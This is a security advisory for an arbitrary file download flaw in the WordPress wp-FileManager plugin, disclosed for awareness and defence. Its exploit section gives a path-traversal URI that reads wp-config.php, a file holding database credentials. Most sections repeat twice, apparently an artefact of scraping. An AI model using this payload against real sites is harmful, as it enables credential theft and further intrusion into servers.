WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download Vulnerability
BID:59886
Info
WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download Vulnerability
| Bugtraq ID: | 59886 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 15 2013 12:00AM |
| Updated: | May 15 2013 12:00AM |
| Credit: | ByEge |
| Vulnerable: |
WordPress wp-FileManager 0 |
| Not Vulnerable: | |
Discussion
WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download Vulnerability
The wp-FileManager plugin for WordPress is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks.
The wp-FileManager plugin for WordPress is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks.
Exploit / POC
WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
Solution / Fix
WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download Vulnerability
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download Vulnerability
References:
References:
- WordPress Homepage (WordPress)
- wp-FileManager Homepage (anantshri)